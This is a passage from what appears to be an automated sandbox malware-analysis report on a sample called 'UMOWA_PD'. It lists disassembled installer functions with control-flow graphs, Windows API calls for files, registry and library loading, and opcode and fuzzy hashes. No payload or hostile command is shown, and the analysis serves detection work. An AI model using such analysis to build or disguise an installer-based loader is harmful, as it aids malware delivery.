                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4024019347-4169018671
                                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                    • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                    • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
                                                                                    Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 860 4055a6-4055bb 861 4055c1-4055d2 860->861 862 405672-405676 860->862 863 4055d4-4055d8 call 40655e 861->863 864 4055dd-4055e9 lstrlenW 861->864 863->864 866 405606-40560a 864->866 867 4055eb-4055fb lstrlenW 864->867 869 405619-40561d 866->869 870 40560c-405613 SetWindowTextW 866->870 867->862 868 4055fd-405601 lstrcatW 867->868 868->866 871 405663-405665 869->871 872 40561f-405661 SendMessageW * 3 869->872 870->869 871->862 873 405667-40566a 871->873 872->871 873->862
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                    • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll
                                                                                    • API String ID: 2531174081-3798749991
                                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                    • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                    • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68
                                                                                    Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 874 4026f1-40270a call 402d89 877 402710-402717 874->877 878 402c2f-402c32 874->878 880 402719 877->880 881 40271c-40271f 877->881 879 402c38-402c3e 878->879 880->881 883 402883-40288b 881->883 884 402725-402734 call 406481 881->884 883->878 884->883 887 40273a 884->887 888 402740-402744 887->888 889 4027d9-4027dc 888->889 890 40274a-402765 ReadFile 888->890 892 4027f4-402804 call 406094 889->892 893 4027de-4027e1 889->893 890->883 891 40276b-402770 890->891 891->883 896 402776-402784 891->896 892->883 902 402806 892->902 893->892 894 4027e3-4027ee call 4060f2 893->894 894->883 894->892 899 40278a-40279c MultiByteToWideChar 896->899 900 40283f-40284b call 406468 896->900 899->902 903 40279e-4027a1 899->903 900->879 905 402809-40280c 902->905 906 4027a3-4027ae 903->906 905->900 908 40280e-402813 905->908 906->905 909 4027b0-4027d5 SetFilePointer MultiByteToWideChar 906->909 910 402850-402854 908->910 911 402815-40281a 908->911 909->906 912 4027d7 909->912 913 402871-40287d SetFilePointer 910->913 914 402856-40285a 910->914 911->910 915 40281c-40282f 911->915 912->902 913->883 916 402862-40286f 914->916 917 40285c-402860 914->917 915->883 918 402831-402837 915->918 916->883 917->913 917->916 918->888 919 40283d 918->919 919->883
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                                      • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                    • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                    • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                    • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                    Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 920 4032b9-4032d0 921 4032d2 920->921 922 4032d9-4032e1 920->922 921->922 923 4032e3 922->923 924 4032e8-4032ed 922->924 923->924 925 4032fd-40330a call 40349e 924->925 926 4032ef-4032f8 call 4034b4 924->926 930 403310-403314 925->930 931 403455 925->931 926->925 932 40331a-40333a GetTickCount call 406a70 930->932 933 40343e-403440 930->933 934 403457-403458 931->934 946 403494 932->946 948 403340-403348 932->948 935 403442-403445 933->935 936 403489-40348d 933->936 938 403497-40349b 934->938 939 403447 935->939 940 40344a-403453 call 40349e 935->940 941 40345a-403460 936->941 942 40348f 936->942 939->940 940->931 954 403491 940->954 944 403462 941->944 945 403465-403473 call 40349e 941->945 942->946 944->945 945->931 956 403475-403481 call 4060c3 945->956 946->938 951 40334a 948->951 952 40334d-40335b call 40349e 948->952 951->952 952->931 958 403361-40336a 952->958 954->946 963 403483-403486 956->963 964 40343a-40343c 956->964 960 403370-40338d call 406a90 958->960 966 403393-4033aa GetTickCount 960->966 967 403436-403438 960->967 963->936 964->934 968 4033f5-4033f7 966->968 969 4033ac-4033b4 966->969 967->934 972 4033f9-4033fd 968->972 973 40342a-40342e 968->973 970 4033b6-4033ba 969->970 971 4033bc-4033ed MulDiv wsprintfW call 4055a6 969->971 970->968 970->971 979 4033f2 971->979 976 403412-403418 972->976 977 4033ff-403404 call 4060c3 972->977 973->948 974 403434 973->974 974->946 978 40341e-403422 976->978 982 403409-40340b 977->982 978->960 981 403428 978->981 979->968 981->946 982->964 983 40340d-403410 982->983 983->978
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: ... %d%%
                                                                                    • API String ID: 551687249-2449383134
                                                                                    • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                    • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                                                    • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                    • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9
                                                                                    Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 984 4068a5-4068c5 GetSystemDirectoryW 985 4068c7 984->985 986 4068c9-4068cb 984->986 985->986 987 4068dc-4068de 986->987 988 4068cd-4068d6 986->988 990 4068df-406912 wsprintfW LoadLibraryExW 987->990 988->987 989 4068d8-4068da 988->989 989->990
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                    • wsprintfW.USER32 ref: 004068F7
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                    • API String ID: 2200240437-1106614640
                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8
                                                                                    Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 991 402eae-402ed7 call 40638e 993 402edc-402ee0 991->993 994 402f91-402f95 993->994 995 402ee6-402eea 993->995 996 402eec-402f0d RegEnumValueW 995->996 997 402f0f-402f22 995->997 996->997 998 402f76-402f84 RegCloseKey 996->998 999 402f4b-402f52 RegEnumKeyW 997->999 998->994 1000 402f24-402f26 999->1000 1001 402f54-402f66 RegCloseKey call 406915 999->1001 1000->998 1002 402f28-402f3c call 402eae 1000->1002 1007 402f86-402f8c 1001->1007 1008 402f68-402f74 RegDeleteKeyW 1001->1008 1002->1001 1009 402f3e-402f4a 1002->1009 1007->994 1008->994 1009->999
                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                    • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                    • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                                                    Function 6FE21817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1010 6fe21817-6fe21856 call 6fe21bff 1014 6fe21976-6fe21978 1010->1014 1015 6fe2185c-6fe21860 1010->1015 1016 6fe21862-6fe21868 call 6fe2243e 1015->1016 1017 6fe21869-6fe21876 call 6fe22480 1015->1017 1016->1017 1022 6fe218a6-6fe218ad 1017->1022 1023 6fe21878-6fe2187d 1017->1023 1024 6fe218af-6fe218cb call 6fe22655 call 6fe21654 call 6fe21312 GlobalFree 1022->1024 1025 6fe218cd-6fe218d1 1022->1025 1026 6fe21898-6fe2189b 1023->1026 1027 6fe2187f-6fe21880 1023->1027 1048 6fe21925-6fe21929 1024->1048 1031 6fe218d3-6fe2191c call 6fe21666 call 6fe22655 1025->1031 1032 6fe2191e-6fe21924 call 6fe22655 1025->1032 1026->1022 1033 6fe2189d-6fe2189e call 6fe22e23 1026->1033 1029 6fe21882-6fe21883 1027->1029 1030 6fe21888-6fe21889 call 6fe22b98 1027->1030 1037 6fe21890-6fe21896 call 6fe22810 1029->1037 1038 6fe21885-6fe21886 1029->1038 1044 6fe2188e 1030->1044 1031->1048 1032->1048 1041 6fe218a3 1033->1041 1047 6fe218a5 1037->1047 1038->1022 1038->1030 1041->1047 1044->1041 1047->1022 1053 6fe21966-6fe2196d 1048->1053 1054 6fe2192b-6fe21939 call 6fe22618 1048->1054 1053->1014 1056 6fe2196f-6fe21970 GlobalFree 1053->1056 1060 6fe21951-6fe21958 1054->1060 1061 6fe2193b-6fe2193e 1054->1061 1056->1014 1060->1053 1063 6fe2195a-6fe21965 call 6fe215dd 1060->1063 1061->1060 1062 6fe21940-6fe21948 1061->1062 1062->1060 1064 6fe2194a-6fe2194b FreeLibrary 1062->1064 1063->1053 1064->1060
                                                                                    APIs
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E74
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E79
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE218C5
                                                                                    • FreeLibrary.KERNEL32(?), ref: 6FE2194B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21970
                                                                                      • Part of subcall function 6FE2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FE2246F
                                                                                      • Part of subcall function 6FE22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FE21896,00000000), ref: 6FE228E0
                                                                                      • Part of subcall function 6FE21666: wsprintfW.USER32 ref: 6FE21694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-3916222277
                                                                                    • Opcode ID: 66d2a8f602251dfe2291174ec51e0f55fd57cd519dfabf1ca086451859e4ea2a
                                                                                    • Instruction ID: c15ccea1fc214c1efc336a8cbfe407ecd678a9cde8dddeeb1dca48da1c12bccd
                                                                                    • Opcode Fuzzy Hash: 66d2a8f602251dfe2291174ec51e0f55fd57cd519dfabf1ca086451859e4ea2a
                                                                                    • Instruction Fuzzy Hash: F441B371400345AADB049FB4DDC4BD53FE8BF0635CF24456AE9149A2D6FB7EA2848BA0
                                                                                    Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1067 406040-40604c 1068 40604d-406081 GetTickCount GetTempFileNameW 1067->1068 1069 406090-406092 1068->1069 1070 406083-406085 1068->1070 1072 40608a-40608d 1069->1072 1070->1068 1071 406087 1070->1071 1071->1072
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0040605E
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-944333549
                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                                                    Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: Call
                                                                                    • API String ID: 3356406503-1824292864
                                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                    Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
